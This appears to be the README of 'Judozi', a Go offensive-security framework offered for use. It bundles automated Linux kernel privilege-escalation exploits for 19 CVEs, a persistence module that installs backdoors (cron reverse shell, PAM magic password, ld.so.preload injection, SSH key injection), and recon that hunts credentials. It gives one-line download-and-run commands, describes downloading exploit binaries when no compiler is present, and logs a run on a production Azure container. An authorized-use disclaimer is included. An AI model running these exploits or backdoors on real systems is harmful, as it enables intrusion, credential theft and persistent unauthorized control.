+ Modular Plugin System
Drop-in module support
+ Module Registry
Auto-discovery and loading
+ Interactive UI
Clean module selection menu
+ Command-line Interface
Direct module execution
+ Extensible Architecture
Easy to add new modules
+ Zero Dependencies
Pure Go, static binary |
! Dynamic Exploit Library
Kernel 2.6.22 β 6.7.1 coverage
! Smart Detection
Auto-detects vulnerabilities
! Hybrid Execution
Compile OR precompiled
! GCC-Free Mode
Works without compiler
! Binary Fallback
Download when needed
! Automatic Mode
Try all exploits |
wget https://github.com/past3l/judozi/raw/main/judozi && chmod +x judozi && ./judozigit clone https://github.com/past3l/judozi.git
cd judozi
CGO_ENABLED=0 go build -ldflags="-s -w" -o judozi ./cmd/judozi
./judoziRun Judozi and select a module interactively:
./judoziπΈ Click to see module selection
βββββββββ ββ βββββββ ββββββ βββββββββ βββ
βββ ββ ββββ ββββ βββββββ ββββ β β βββββββ
βββ βββ ββββ βββ ββββββ ββββ β ββββ ββββ
βββββββ βββ ββββ ββββ ββββ βββ βββ βββββ
βββββ ββββββββ βββββββ β ββββββββββββββββββββ
ββββββββββββββββββββββββββββββββββββββββββββββββββ
β Modular Offensive Security Framework v2.0 β
β Author: past3l@mileniumsec β
β GitHub: github.com/past3l/judozi β
ββββββββββββββββββββββββββββββββββββββββββββββββββ
SELECT MODULE:
[1] kernel
privesc - Automated Linux Kernel Privilege Escalation
ββββββββββββββββββββββββββββββββββββββββββ
β Enter number (1-N) or 'q' to quit β
ββββββββββββββββββββββββββββββββββββββββββ
>
Run a specific module directly:
# Run kernel module interactively
./judozi kernel
# List all kernel exploits
./judozi kernel -list
# Automatic mode (try all matching exploits)
./judozi kernel -auto
# Target specific CVE
./judozi kernel -cve CVE-2022-0847
# Use custom exploit mirror
./judozi kernel -mirror https://example.com/exploits# List all available modules
./judozi -l
./judozi --list
# Show help
./judozi -h
./judozi --help
# Run a module with args
./judozi [module] [module-args]Automated Linux kernel privilege escalation framework with 19+ exploits.
Features:
- Smart kernel version detection
- Automatic exploit matching
- Hybrid execution (compile or precompiled)
- GCC-free mode with binary fallback
- Range: Kernel 2.6.22 β 6.7.1
./judozi kernel # Interactive mode
./judozi kernel -list # List all exploits
./judozi kernel -auto # Try all matching
./judozi kernel -cve CVE-2022-08478 proven persistence techniques with stealth rating and reboot survival info.
Techniques:
- SSH authorized_keys injection
- Cron reverse shell (every 10 min)
- Systemd service (
system-monitor) - Custom SUID binary
/etc/ld.so.preloadshared lib injection- PAM auth bypass (magic password backdoor)
.bashrc/.profileinjection- SUID bash copy
./judozi persistence # Interactive selection
./judozi persistence -list # List all techniques
./judozi persistence 3 # Install technique #3
./judozi persistence -remove # Remove installed backdoors12 parallel reconnaissance techniques. All output auto-saved to ./recon/ directory.
Techniques:
- System info (OS, CPU, memory, kernel, env, installed tools)
- Network enumeration (interfaces, routes, ports, ARP, DNS, firewall rules)
- User & group enumeration (sudoers, shadow, login history, dotfiles)
- SUID/SGID binaries + GTFOBins detection
- Process enumeration (cmdlines, root procs, env secrets)
- Credential hunting (SSH keys,
.env, config files, AWS/k8s creds) - Cron & scheduled tasks (crontab, systemd timers, at jobs)
- Service enumeration (systemd, init.d, versions)
- Container & Docker recon (socket, cgroups, namespaces, metadata service)
- Environment secrets (env vars,
/procenv, process cmdlines) - SSH & lateral movement (known_hosts, agent sockets, authorized_keys)
- Filesystem (writable dirs/files, sensitive files, backup files, logs)
./judozi recon # Run all 12 techniques in parallel β saves to ./recon/
./judozi recon -list # List techniques
./judozi recon 1 4 7 # Run specific techniques by ID
./judozi recon -dir /tmp # Save to custom directory
./judozi recon -nosave # Print to stdout only- container - Container escape techniques (Docker socket, cgroup v1, privileged, overlay)
Constantly updated repository of kernel privilege escalation vulnerabilities
CVE-2024-1086 | nf_tables UAF | 3.15.0 β 6.7.1 | amd64 | nftables, uaf |
CVE-2023-3269 | StackRot | 6.1.0 β 6.4.0 | amd64 | maple-tree, uaf |
CVE-2023-32233 | Netfilter nf_tables UAF | 3.13.0 β 6.3.1 | amd64 | nftables, uaf |
CVE-2023-2640 | GameOver(lay) | 5.15.0 β 6.2.0 | amd64, arm64 | overlayfs, ubuntu |
CVE-2022-34918 | Netfilter Heap Overflow | 5.8.0 β 5.18.8 | amd64 | nftables, heap |
CVE-2022-2588 | DirtyCred | 3.6.0 β 5.19.1 | amd64 | route4, uaf |
CVE-2022-1015 | nf_tables OOB | 5.12.0 β 5.17.0 | amd64 | nftables, oob |
CVE-2022-0847 | DirtyPipe | 5.8.0 β 5.16.10 | amd64, arm64 | pipe, write-anywhere |
CVE-2022-0185 | fsconfig Heap Overflow | 5.1.0 β 5.16.1 | amd64 | fsconfig, heap |
CVE-2021-33909 | Sequoia | 3.16.0 β 5.13.3 | amd64 | filesystem, seq_file |
CVE-2021-22555 | Netfilter xt_compat | 2.6.19 β 5.12.0 | amd64 | netfilter, oob-write |
CVE-2021-3493 | OverlayFS Ubuntu | 3.13.0 β 5.10.99 | amd64, arm64 | overlayfs, ubuntu |
CVE-2020-8835 | eBPF Verifier Bypass | 5.5.0 β 5.6.1 | amd64 | ebpf, verifier |
CVE-2019-13272 | ptrace_link | 4.10.0 β 5.1.17 | amd64, arm64 | ptrace, creds |
CVE-2017-16995 | eBPF Arbitrary R/W | 4.4.0 β 4.14.7 | amd64 | ebpf, sign-extension |
CVE-2017-7308 | AF_PACKET | 2.6.27 β 4.10.5 | amd64 | af_packet, heap-oob |
CVE-2017-1000112 | UDP UFO | 4.4.0 β 4.12.6 | amd64 | udp, ufo |
CVE-2016-5195 | DirtyCow | 2.6.22 β 4.8.2 | amd64, arm64 | cow, race-condition |
CVE-2016-0728 | Keyring Refcount | 3.8.0 β 4.4.0 | amd64 | keyring, refcount |
|
| ||||
ββββββββββββββββββββββββββββββββββββββββββββββ
β JUDOZI FRAMEWORK PIPELINE β
β βββββββββββββββββββββββββββββββββββββββββββββ£
β β
β [1] INIT β
β ββ Load module registry β
β ββ Auto-discover modules β
β ββ Initialize UI β
β β
β [2] MODULE SELECTION β
β ββ Interactive menu β
β ββ Direct CLI execution β
β ββ Validate availability β
β β
β [3] EXECUTION β
β ββ Load selected module β
β ββ Pass arguments β
β ββ Execute module.Run() β
β β
ββββββββββββββββββββββββββββββββββββββββββββββ
Module Interface:
type Module interface {
Name() string
Description() string
Category() string
Run(args []string) error
}judozi/
βββ cmd/judozi/main.go # Entry point, module registry
βββ modules/
β βββ kernel/ # Kernel privesc (19 CVEs)
β βββ persistence/ # 8 persistence techniques
β βββ recon/ # 12 recon techniques
β βββ techniques/
βββ pkg/
β βββ module/ # Module interface + registry
β βββ shell/ # Interactive shell
β βββ ui/ # Terminal UI helpers
βββ binaries/ # Precompiled exploit binaries
βββ go.mod
βββ README.md
|
Successfully tested on Azure Container (Production Environment) |
nextjs@container:/tmp$ uname -r
5.15.0-1102-azure
nextjs@container:/tmp$ ./judozi
[*] Kernel: 5.15.0
[+] Found 10 potential exploit(s)
> all
[!] GCC not available, downloading precompiled binary
[*] Downloading CVE-2024-1086...
[+] Binary downloaded successfully
[*] Executing exploit...
[*] creating user namespace (CLONE_NEWUSER)...
[*] creating network namespace (CLONE_NEWNET)...This tool is designed exclusively for:
YOU MUST HAVE EXPLICIT PERMISSION to use this tool on any system.
|
ALLOWED + Testing your own systems
+ Authorized pentesting
+ Educational research
+ CTF competitions |
ILLEGAL - Unauthorized access
- Systems you don't own
- Malicious intent
- Illegal privilege escalation |
- Go 1.22 or higher
- No other dependencies required (CGO disabled)
# Standard build (static binary)
CGO_ENABLED=0 go build -ldflags="-s -w" -o judozi .
# Cross-compile for ARM64
GOARCH=arm64 CGO_ENABLED=0 go build -ldflags="-s -w" -o judozi-arm64 .
# Cross-compile for 32-bit/cmd/judozi
# Cross-compile for ARM64
GOARCH=arm64 CGO_ENABLED=0 go build -ldflags="-s -w" -o judozi-arm64 ./cmd/judozi
# Cross-compile for 32-bit
GOARCH=386 CGO_ENABLED=0 go build -ldflags="-s -w" -o judozi-i386 ./cmd/judozi
# Debug build (with symbols)
CGO_ENABLED=0 go build -o judozi-debug ./cmd/judoziCGO_ENABLED=0β Produce pure static binary-ldflags="-s -w"β Strip debug symbols (smaller size)-o judoziβ Output filename./cmd/judoziβ Entry point path
Contributions are welcome! Here's how you can help: Modules
Create a new module by implementing the Module interface:
package mymodule
import "github.com/judozi/judozi/pkg/module"
type MyModule struct{}
func New() module.Module {
return &MyModule{}
}
func (m *MyModule) Name() string {
return "mymodule"
}
func (m *MyModule) Description() string {
return "My awesome module"
}
func (m *MyModule) Category() string {
return "exploitation"
}
func (m *MyModule) Run(args []string) error {
// Your module logic here
return nil
}Then register it in cmd/judozi/main.go:
registry.Register(mymodule.New())- Add exploit metadata to
modules/kernel/pkg/vulndb/exploits.json:
{
"id": "CVE-XXXX-XXXXX",
"name": "Exploit Name",
"description": "Technical description",
"min_kernel": "X.X.X",
"max_kernel": "X.X.X",
"arch": ["amd64"],
"source": "https://github.com/.../exploit.c",
"binary": "https://raw.githubusercontent.com/past3l/judozi/main/binaries/CVE-XXXX-XXXXX",
"compile": "gcc -o {bin} {src} -static",
"execute": "{bin}",
"requirements": ["gcc"],
"tags": ["tag1", "tag2"],
"references": ["https://nvd.nist.gov/..."]
}- Compile static binary and add to
modules/kernel/binaries/ - Test on target kernel version
- Submit pull request
|
Bug Reports |
Feature Requests |
Security Issues Contact privately |
Educational Use Only
This project is provided for educational and research purposes. Exploit code belongs to the original authors and researchers. See individual exploit references for specific licensing.
|
Exploit Sources |
|
past3l @ mileniumsec
Special thanks to:
|
Research Organizations
|
Notable Researchers
|
|
Use this tool ethically and legally. Always obtain proper authorization. Made by past3l | Star this repo if you find it useful |